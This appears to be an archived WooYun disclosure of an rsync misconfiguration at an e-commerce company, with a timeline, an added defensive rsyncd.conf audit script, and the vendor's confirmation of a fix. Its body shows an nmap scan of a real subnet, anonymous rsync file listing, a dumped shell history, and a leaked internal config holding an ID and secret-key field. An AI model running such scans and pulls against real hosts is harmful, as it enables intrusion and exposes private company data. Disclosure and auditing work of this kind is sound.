WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2013-01-09: Details sent to the vendor, awaiting vendor handling
2013-01-11: Vendor confirmed; details disclosed to the vendor only
2013-01-21: Details disclosed to core white hats and experts in the relevant field
2013-01-31: Details disclosed to regular white hats
2013-02-10: Details disclosed to intern white hats
2013-02-23: Details disclosed to the public
An rsync misconfiguration leaks sensitive information
First, scan the same subnet; a lot of people never set up rsync properly. Pinging vipshop.com gives a network range.
nmap 180.186.22.1/24 -p873 --open

Starting Nmap 5.51 ( http://nmap.org ) at 2013-01-09 16:24 CST
Nmap scan report for 180.186.22.14
Host is up (0.0053s latency).
PORT    STATE SERVICE
873/tcp open  rsync
Nmap scan report for 180.186.22.22
Host is up (0.0043s latency).
PORT    STATE SERVICE
873/tcp open  rsync
Good, that turned up a few.
rsync 180.186.22.14::m2

drwxr-xr-x        4096 2012/11/15 17:35:00 .
-rw-------        5433 2012/09/12 13:35:48 .bash_history
-rw-r--r--          33 2012/05/22 17:18:18 .bash_logout
-rw-r--r--         176 2012/05/22 17:18:18 .bash_profile
-rw-r--r--         124 2012/05/22 17:18:18 .bashrc
-rw-------          32 2012/07/13 10:42:30 .mysql_history
-rw-------        7708 2012/08/20 17:43:59 .viminfo
drwx------        4096 2012/07/13 10:44:56 .elinks
drwxr-xr-x        4096 2012/11/27 00:20:00 360
drwxr-xr-x        4096 2012/11/23 18:36:42 config
drwxr-xr-x        4096 2012/09/06 10:27:47 etao
drwxr-xr-x        4096 2012/12/20 00:30:01 filetemp
drwxr-xr-x        4096 2012/12/20 00:44:47 log
drwxr-xr-x        4096 2012/12/20 13:33:19 pictemp
cat .bash_history

ls
ll
cd /usr/local/tomcat/
ls
./bin/shutdown.sh
netstat -tpln
./bin/startup.sh
ll
cd conf/
ls
vim server.xml
cd ..
ls
./bin/shutdown.sh
./bin/startup.sh
tail -f logs/catalina.out
netstat -tpln
w
exit
ls
cd /usr/local/tomcat/bin/shutdown.sh
/usr/local/tomcat/bin/shutdown.sh
/usr/local/tomcat/bin/startup.sh
netstat -tpln
netstat -tpln
cd /usr/local/tomcat/
ls
tail -f logs/catalina.out
vim logs/catalina.out
vim /etc/hosts
hostname
exit
ls
/usr/local/tomcat/bin/shutdown.sh
/usr/local/tomcat/bin/startup.sh
ls
netstat -tpln
netstat -tpln
netstat -tpln
netstat -tpln
cd /usr/local/tomcat/
ls
cd logs/
tail -fn 200 catalina.out
ls
netstat -tpln
vim catalina.out
ls
cd ..
ls
cd conf/
ls
vim tomcat-users.xml
ls
vim server.xml
/usr/local/tomcat/bin/shutdown.sh
netstat -tpln
/usr/local/tomcat/bin/startup.sh
tail -f ../logs/catalina.out
cd ..
ls
vim logs/catalina.out
vim conf/server.xml
ls
vim logs/catalina.out
vim conf/server.xml
ls
vim conf/tomcat-users.xml
./bin/shutdown.sh
./bin/startup.sh
tail -f logs/catalina.out
vim conf/tomcat-users.xml
./bin/shutdown.sh
./bin/startup.sh
tail -f logs/catalina.out
vim conf/tomcat-users.xml
./bin/shutdown.sh
./bin/startup.sh
tail -f logs/catalina.out
ex
exit
ls
/usr/local/tomcat/bin/shutdown.sh
/usr/local/tomcat/bin/startup.sh
cd /usr/local/tomcat/
ls
cd logs/
ls
tail -f catalina.out
w
top
tail -f catalina.out
tail -f catalina.out
/usr/local/tomcat/bin/shutdown.sh
cd /usr/local/tomcat/bin/
ls
vim catalina.sh
ls
/usr/local/tomcat/bin/startup.sh
ls
cd ..
ls
tail -f logs/catalina.out
ls
cd /data/vipPlatform/
ls
vim config/vipshop-config.xml
ls
cd ..
cd /usr/local/tomcat/bin/
ls
vim catalina.sh
/usr/local/tomcat/bin/shutdown.sh
w
top
/usr/local/tomcat/bin/startup.sh
cd ..
ls
tail -f logs/catalina.out
cd /data/vipMobile/config/
ls
vim vipshop-config.xml
cd /usr/
ls
cd
cd /usr/local/tomcat/
ls
cd /usr/local/tomcat/
ls
cd webapps/
ls
cd /usr/local/mysql/
ls
cd data/
ls
top
/usr/local/tomcat/bin/shutdown.sh
w
w
w
top
df -h
free -m
df -h
vim /etc/my.cnf
/usr/local/tomcat/bin/startup.sh
cd /usr/local/tomcat/
ls
tail -f logs/catalina.out
/usr/local/tomcat/bin/shutdown.sh
/usr/local/tomcat/bin/startup.sh
tail -f logs/catalina.out
/usr/local/tomcat/bin/shutdown.sh
/usr/local/tomcat/bin/startup.sh
tail -f logs/catalina.out
tail -f logs/catalina.out
tail -f logs/catalina.out
w
top
tail -f logs/catalina.out
tail -f logs/catalina.out
/usr/local/tomcat/bin/shutdown.sh
/usr/local/tomcat/bin/startup.sh
tail -f logs/catalina.out
/usr/local/tomcat/bin/shutdown.sh
w
w
cd /usr/local/tomcat/webapps/
ls
ll
netstat -tpln
netstat -tpln
netstat -tpln
ls
*.war /tmp/
mv *.war /tmp/
ll
ll
/usr/local/tomcat/bin/startup.sh
netstat -tpln
ll
rm -rf vipMobile
chown -R tomcat.tomcat .
cp ../vipPlatform.war .
exit
ll
cp /usr/local/tomcat/vipMobile.war /usr/local/tomcat/webapps/
cd /usr/local/tomcat/
cat vipshop-config.xml

<?xml version="1.0" encoding="UTF-8" ?>
<vipshop-config>
  <config name="qqapi">
    <publish_to>qq</publish_to>
    <cooperatorid>855006109</cooperatorid>
    <secretkey>abcdefghabcdefghabcdefghabcdefgh</secretkey>
    <add_sku_method>addSKU</add_sku_method>
    <add_sku_url>http://apitest.buy.qq.com/item/addSKU.xhtml</add_sku_url>
    <add_sku_detail_method>addSKUDetail</add_sku_detail_method>
    <add_sku_detail_url>http://apitest.buy.qq.com/item/addSKUDetail.xhtml</add_sku_detail_url>
    <add_sku_pic_method>addSKUPic</add_sku_pic_method>
    <add_sku_pic_url>http://apitest.buy.qq.com/item/addSKUPic.xhtml</add_sku_pic_url>
    <add_sku_stock_method>modifySKUStock</add_sku_stock_method>
    <add_sku_stock_url>http://apitest.buy.qq.com/item/modifySKUStock.xhtml</add_sku_stock_url>
    <add_sku_batch_stock_method>batchModifySKUStock</add_sku_batch_stock_method>
    <add_sku_batch_stock_url>http://apitest.buy.qq.com/item/batchModifySKUStock.xhtml</add_sku_batch_stock_url>
    <queryDealList_method>queryDealListV2</queryDealList_method>
    <queryDealList_url>http://apitest.buy.qq.com/deal/queryDealListV2.xhtml</queryDealList_url>
    <queryDealDetail_method>queryDealDetailV2</queryDealDetail_method>
    <queryDealDetail_url>http://apitest.buy.qq.com/deal/queryDealDetailV2.xhtml</queryDealDetail_url>
    <signCheckResult_method>signCheckResultV2</signCheckResult_method>
    <signCheckResult_url>http://apitest.buy.qq.com/deal/signCheckResultV2.xhtml</signCheckResult_url>
    <signShip_method>signShipV2</signShip_method>
    <signShip_url>http://apitest.buy.qq.com/deal/signShipV2.xhtml</signShip_url>
    <signRecvState_method>signRecvStateV2</signRecvState_method>
    <signRecvState_url>http://apitest.buy.qq.com/deal/signRecvStateV2.xhtml</signRecvState_url>
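A defender-side check, added here and not part of the original report: this Python script parses an rsyncd.conf and flags modules exposed the way the m2 module above was (anonymous, unrestricted, listable, served as root, so even mode-600 dotfiles come out). The sample configuration is constructed, and the rsync defaults the checks assume are stated in the code.

```python
# Added example, not code from the report: flag rsyncd.conf modules exposed the way the
# report above describes. The config is constructed; "m2" is the module name from the listing.
SAMPLE_RSYNCD_CONF = """\
uid = root

[m2]
path = /home/m2

[backup]
path = /srv/backup
hosts allow = 10.0.0.0/8
auth users = backup
secrets file = /etc/rsyncd.secrets
list = no
uid = backup
"""

def parse_rsyncd_conf(text):
    """Minimal rsyncd.conf parser: '[module]' headers, 'key = value' lines, '#'/';' comments.
    Keys are case-insensitive; parameters before the first module are globals."""
    glob, modules, cur = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            cur = line[1:-1].strip()
            modules[cur] = {}
        elif "=" in line:
            key, _, val = line.partition("=")
            (glob if cur is None else modules[cur])[key.strip().lower()] = val.strip()
    return glob, modules

# (parameter, rsync default assumed here, predicate on the lowercased value, finding)
CHECKS = [
    ("auth users", "", lambda v: not v, "no 'auth users': any client that reaches port 873 can read it"),
    ("hosts allow", "", lambda v: not v, "no 'hosts allow': access is not limited to trusted networks"),
    ("list", "yes", lambda v: v not in ("no", "false", "0"), "'list' is yes: shows up in 'rsync host::' output"),
    ("read only", "yes", lambda v: v in ("no", "false", "0"), "'read only = no': clients can push files into it"),
    ("uid", "nobody", lambda v: v in ("root", "0"), "runs as root: mode-600 files such as .bash_history are readable"),
]

def audit_module(settings, glob):
    """Findings for one module; a value comes from the module, else the global section, else the default."""
    return [msg for key, default, bad, msg in CHECKS
            if bad(settings.get(key, glob.get(key, default)).lower())]

def audit(text):
    """Map each module name to its findings; an empty list means nothing was flagged."""
    glob, modules = parse_rsyncd_conf(text)
    return {name: audit_module(settings, glob) for name, settings in modules.items()}
```

Running `audit(open("/etc/rsyncd.conf").read())` on a real daemon's config lists, per module, which of these settings is missing or weak.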
Severity: Low
Vulnerability Rank: 3
Confirmed: 2013-01-11 14:21
Thanks for the report; it has been fixed.
None at present